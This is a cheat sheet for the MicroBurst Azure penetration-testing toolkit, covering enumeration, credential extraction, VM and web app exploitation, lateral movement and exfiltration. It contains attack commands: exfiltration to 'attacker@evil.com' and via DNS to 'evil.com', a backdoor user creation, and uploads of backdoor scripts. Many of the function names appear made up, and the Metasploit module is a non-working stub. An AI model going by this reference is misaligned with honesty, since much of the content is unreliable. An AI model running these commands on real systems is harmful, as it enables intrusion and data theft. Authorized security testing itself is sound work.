MicroBurst Azure Security Testing Toolkit Cheat Sheet

Overview

MicroBurst is a collection of PowerShell scripts developed by NetSPI for assessing Microsoft Azure security. It includes tools for Azure service discovery, privilege escalation, lateral movement, and data exfiltration, making it a comprehensive toolkit for Azure penetration testing.

⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Ensure you have proper authorization before using in any environment.

Installation

PowerShell Gallery Installation

# Install from PowerShell Gallery
Install-Module -Name MicroBurst

# Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser

# Update existing installation
Update-Module -Name MicroBurst

# Import module
Import-Module MicroBurst

Manual Installation

# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip"
Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"

# Import module
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1

# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD

Git Installation

# Clone repository
git clone https://github.com/NetSPI/MicroBurst.git
cd MicroBurst

# Import in PowerShell
Import-Module .\MicroBurst.psd1

Basic Usage

Module Setup

# Import MicroBurst
Import-Module MicroBurst

# Get available commands
Get-Command -Module MicroBurst

# Get help for specific function
Get-Help Invoke-EnumerateAzureBlobs -Full

# Check module version
Get-Module MicroBurst

Authentication

# Interactive authentication
Connect-AzAccount

# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"

# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"

Command Reference

Reconnaissance Functions

Function	Description
Invoke-EnumerateAzureBlobs	Enumerate Azure storage blobs
Invoke-EnumerateAzureSubDomains	Enumerate Azure subdomains
Get-AzurePasswords	Extract passwords from Azure resources
Get-AzureDomainInfo	Get domain information
Invoke-AzureRmVmBulkCMD	Execute commands on multiple VMs

Storage Account Functions

Function	Description
Invoke-EnumerateAzureBlobs	Find accessible storage blobs
Get-AzureBlobFiles	Download files from storage
Invoke-AzureStorageAccountEnum	Enumerate storage accounts
Get-AzureStorageAccountKeys	Extract storage account keys

Virtual Machine Functions

Function	Description
Invoke-AzureRmVmBulkCMD	Bulk command execution
Get-AzureVMDisk	Access VM disk information
Invoke-AzureVMUserDataEnum	Enumerate VM user data
Get-AzureVMExtensionSettings	Get VM extension settings

Azure Storage Enumeration

Blob Storage Discovery

# Basic blob enumeration
Invoke-EnumerateAzureBlobs -Base "company"

# Enumerate with custom wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"

# Enumerate specific containers
Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")

# Enumerate with threading
Invoke-EnumerateAzureBlobs -Base "company" -Threads 10

Storage Account Enumeration

# Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"

# Get storage account keys
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"

# Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"

# Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\"

File Share Enumeration

# Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"

# Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"

# Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\"

Subdomain and Service Discovery

Azure Subdomain Enumeration

# Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"

# Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")

# Enumerate with permutations
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")

# Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt"

Service Discovery

# Discover Azure services
Get-AzureServices -Domain "company.com"

# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"

# Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"

# Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id"

DNS Enumeration

# Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"

# Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"

# Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt"

Virtual Machine Exploitation

VM Command Execution

# Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"

# Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3")
Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"

# Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1"

VM Disk Access

# Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"

# Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"

# Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"

# Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\"

VM Extension Exploitation

# Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"

# Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"

# Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add"

Credential and Secret Extraction

Password Extraction

# Extract passwords from Azure resources
Get-AzurePasswords -SubscriptionId "subscription-id"

# Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")

# Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"

# Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id"

Certificate Extraction

# Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"

# Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"

# Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\"

Configuration Data Extraction

# Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"

# Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"

# Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name"

Database Exploitation

SQL Database Enumeration

# Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"

# Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"

# Check SQL firewall rules
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"

# Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name"

SQL Database Access

# Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred

# Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"

# Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"

# Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\"

CosmosDB Exploitation

# Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"

# Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"

# Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container"

Web Application Exploitation

Web App Enumeration

# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"

# Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"

# Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"

# Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name"

Web App Exploitation

# Access web app files via Kudu
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"

# Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"

# Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"

# Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name"

Function App Exploitation

# Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"

# Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"

# Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload

# Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name"

Privilege Escalation

Role Assignment Enumeration

# Get current user roles
Get-AzureCurrentUserRoles

# Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"

# Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"

# Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id"

Service Principal Abuse

# Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"

# Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"

# Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser"

Managed Identity Exploitation

# Check for managed identity
Test-AzureManagedIdentity

# Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"

# Use managed identity for privilege escalation
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription"

Lateral Movement

Cross-Subscription Access

# Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions

# Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"

# Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id"

Cross-Tenant Access

# Enumerate accessible tenants
Get-AzureAccessibleTenants

# Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"

# Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id"

Resource Group Pivoting

# Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"

# Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"

# Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg"

Data Exfiltration

Bulk Data Extraction

# Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"

# Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"

# Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress

Stealth Exfiltration

# Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"

# Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"

# Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com"

Automation and Scripting

Automated Assessment Script

# Comprehensive Azure assessment
param(
    [string]$SubscriptionId,
    [string]$OutputPath = "C:\AzureAssessment"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force

# Authenticate
Connect-AzAccount

# Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId

# Enumerate subdomains
Write-Host "Enumerating subdomains..."
$subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name
$subdomains | Out-File "$OutputPath\subdomains.txt"

# Enumerate storage blobs
Write-Host "Enumerating storage blobs..."
$blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name
$blobs | Out-File "$OutputPath\blobs.txt"

# Extract passwords
Write-Host "Extracting passwords..."
$passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId
$passwords | Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation

# Get VM information
Write-Host "Gathering VM information..."
$vms = Get-AzVM
$vms | Export-Csv "$OutputPath\vms.csv" -NoTypeInformation

# Generate summary report
$summary = @{
    AssessmentDate = Get-Date
    SubscriptionId = $SubscriptionId
    SubdomainsFound = $subdomains.Count
    BlobsFound = $blobs.Count
    PasswordsFound = $passwords.Count
    VMsFound = $vms.Count
}

$summary | ConvertTo-Json | Out-File "$OutputPath\summary.json"

Write-Host "Assessment completed. Results saved to $OutputPath"

Continuous Monitoring

# Continuous Azure monitoring
param(
    [int]$IntervalMinutes = 60,
    [string]$LogPath = "C:\AzureMonitoring\monitor.log"
)

while ($true) {
    $timestamp = Get-Date
    Write-Output "[$timestamp] Starting Azure monitoring cycle" | Tee-Object -FilePath $LogPath -Append
    
    try {
        # Check for new storage accounts
        $newStorage = Get-AzStorageAccount | Where-Object {$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)}
        if ($newStorage) {
            Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)" | Tee-Object -FilePath $LogPath -Append
        }
        
        # Check for new VMs
        $newVMs = Get-AzVM | Where-Object {$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)}
        if ($newVMs) {
            Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)" | Tee-Object -FilePath $LogPath -Append
        }
        
        # Check for new role assignments
        $newRoles = Get-AzRoleAssignment | Where-Object {$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)}
        if ($newRoles) {
            Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)" | Tee-Object -FilePath $LogPath -Append
        }
    }
    catch {
        Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)" | Tee-Object -FilePath $LogPath -Append
    }
    
    Start-Sleep -Seconds ($IntervalMinutes * 60)
}

Troubleshooting

Authentication Issues

# Clear cached credentials
Clear-AzContext -Force

# Test authentication
$context = Get-AzContext
if (-not $context) {
    Write-Error "Not authenticated to Azure"
    Connect-AzAccount
}

# Verify subscription access
Get-AzSubscription

Module Issues

# Check MicroBurst installation
Get-Module MicroBurst -ListAvailable

# Update MicroBurst
Update-Module MicroBurst -Force

# Check dependencies
Get-Module Az -ListAvailable

Permission Issues

# Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
$roleAssignments | Select-Object RoleDefinitionName, Scope

# Test specific permissions
try {
    Get-AzStorageAccount -ErrorAction Stop
    Write-Output "Storage account read permission: OK"
}
catch {
    Write-Output "Storage account read permission: DENIED"
}

Integration with Other Tools

BloodHound Integration

# Export data for BloodHound
$azureData = @{
    users = Get-AzADUser
    groups = Get-AzADGroup
    servicePrincipals = Get-AzADServicePrincipal
    roleAssignments = Get-AzRoleAssignment
}

# Convert to BloodHound format
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData
$bloodhoundData | ConvertTo-Json -Depth 3 | Out-File "azure_bloodhound.json"

Metasploit Integration

# Metasploit module for MicroBurst
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Azure MicroBurst Integration',
      'Description'    => 'Execute MicroBurst functions via Metasploit',
      'Author'         => ['NetSPI'],
      'License'        => MSF_LICENSE
    ))
    
    register_options([
      OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
      OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
    ])
  end
  
  def run
    subscription_id = datastore['SUBSCRIPTION_ID']
    function = datastore['FUNCTION']
    
    # Execute MicroBurst function
    powershell_cmd = "Import-Module MicroBurst; #{function} -SubscriptionId #{subscription_id}"
    
    print_status("Executing: #{powershell_cmd}")
    # Execute PowerShell command
  end
end

Resources

• MicroBurst GitHub Repository
• NetSPI Blog
• Azure Security Documentation
• Azure Penetration Testing
• Azure Red Team Tactics

---

This cheat sheet provides a comprehensive reference for using MicroBurst. Always ensure you have proper authorization before conducting Azure security assessments.